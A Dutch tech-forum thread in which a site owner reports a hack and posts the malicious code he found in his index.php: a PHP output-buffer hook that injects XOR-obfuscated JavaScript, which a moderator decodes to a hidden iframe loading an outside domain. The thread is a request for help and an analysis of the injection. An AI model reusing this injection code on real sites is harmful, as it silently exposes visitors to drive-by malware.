Check alle échte Black Friday-deals Ook zo moe van nepaanbiedingen? Wij laten alleen échte deals zien
Toon posts:

Website lijkt gehacked?*

Pagina: 1
Acties:
  • 176 views sinds 30-01-2008
  • Reageer

donderdag 6 september 2007 11:28

Acties:
  • BFmango
  • Registratie: December 2005
  • Laatst online: 15-12-2024

BFmango

Topicstarter
Hey,

Ik dacht zoals elke dag "Eens kijken of er nog wat op bouweenpc te doen is" waarna ik tot mijn verrassing zag dat de site offline was. Ik kreeg een parse error "Unexpected T_include once" in line 4."

Anyway, terwijl ik me afvraag hoe dat nou in godsnaam kon aangezien niemand van de mensen die toegang heeft tot de server eraan heeft gewerkt sinds gisterennacht, downloadde ik index.php netjes.

Daar viel mij het volgende op in de code:
code:
1
2

ob_start("phpfake");
php


op ongeveer regel 4

helemaal onderaan de pagina vond ik dit:

code:
1
2
3
4
5
6
7

<?php
function phpfake($buffer)
{
$Exp='<script language="JavaScript">e = \'0x00\' + \'6E\';str1 = "%D5%8D%86%9B%F1%9C%9D%96%85%8A%D2%CF%9B%86%9C%86%8F%86%85%86%9D%96%D7%89%86%8D%8D%8A%83%CF%D3%D5%86%8B%9F%8E%82%8A%F1%9C%9F%8C%D2%CF%89%9D%9D%81%D7%C0%C0%96%8A%84%9D%8C%83%9D%C3%86%83%8B%80%C0%85%8D%C0%88%9A%8C%C0%CF%F1%98%86%8D%9D%89%D2%DE%F1%89%8A%86%88%89%9D%D2%DE%D3%D5%C0%86%8B%9F%8E%82%8A%D3%D5%C0%8D%86%9B%D3";str=tmp=\'\';for(i=0;i<str1.length;i+=3){tmp = unescape(str1.slice(i,i+3));str=str+String.fromCharCode((tmp.charCodeAt(0)^e)-127);}document.write(str);</script>';
return (ereg_replace("</body>", "$Exp</body>", $buffer));
}
?>


Anyway, toen ik die 2 stukjes code had weggehaald deed de website het weer.

Mijn vragen nu.

WTF is het?
Heeft iemand onnodig toegang tot de webserver gekregen of is het via een hack? Gaat het nu terugkomen? Wat deed de hack oorspronkelijk?

donderdag 6 september 2007 11:29

Acties:
  • Sjoerd
  • Registratie: December 2003
  • Niet online

Sjoerd

Dit is volgens mij vorige week ookal voor gekomen, precies hetzelfde, even kijken of ik de post nog kan vinden :)

Modelbouw - Alles over modelbouw, van RC tot diorama

donderdag 6 september 2007 11:30

Acties:
  • BtM909
  • Registratie: Juni 2000
  • Niet online

BtM909

Watch out Guys...

Een aantal dingen kloppen niet in dit topic :)

1. Als je Waar hoort mijn topic? leest, dan snap je ook een beetje dat dit onderwerp niet in Webdesign, Markup & Clientside Scripting hoort.

2. Als je Het algemeen beleid #topictitel leest, dan hoor je een begrijpende titel te verzinnen. WTF en ob_start("phpfake") zeggen niks over het daadwerkelijke probleem

3. Je kan code-tags ook diverse languages meegeven, zie ook: Overzicht van UBB-codes #tag_code


Het tweede stukje wat je quote is javascript verpakt in PHP, als je die laatste document.write vervangt door een alert, dan krijg je de volgende code terug:

HTML:
1
2
3

<div style="visibility:hidden">
  <iframe src="http://yektcnt.info/ld/guc/" width=1 height=1></iframe>
</div>

Het lijkt er dus inderdaad op dat je bent gehacked of iemand toegang heeft weten te verschaffen tot je server. Je moet voor jezelf gaan bepalen of je mogelijkheden hebt bijv. via php en na het lezen van Programming FAQ eventueel je startpost aanpassen

Dit probleem is trouwens ook al een keer eerder voorgekomen, zie: [PHP] phpfake hack?. Wellicht staat daar een oplossing of een hoek waar je het moet zoeken :)

[ Voor 100% gewijzigd door BtM909 op 06-09-2007 12:28 ]

Ace of Base vs Charli XCX - All That She Boom Claps (RMT) | Clean Bandit vs Galantis - I'd Rather Be You (RMT)
You've moved up on my notch-list. You have 1 notch
I have a black belt in Kung Flu.

Reageer

Apple iPhone 17 LG OLED evo G5 Google Pixel 10 Samsung Galaxy S25 Star Wars: Outlaws Nintendo Switch 2 Apple AirPods Pro (2e generatie) Sony PlayStation 5 Pro

Tweakers is onderdeel van DPG Media B.V.
Alle rechten voorbehouden - Auteursrecht © 1998 - 2025 Hosting door TrueFullstaq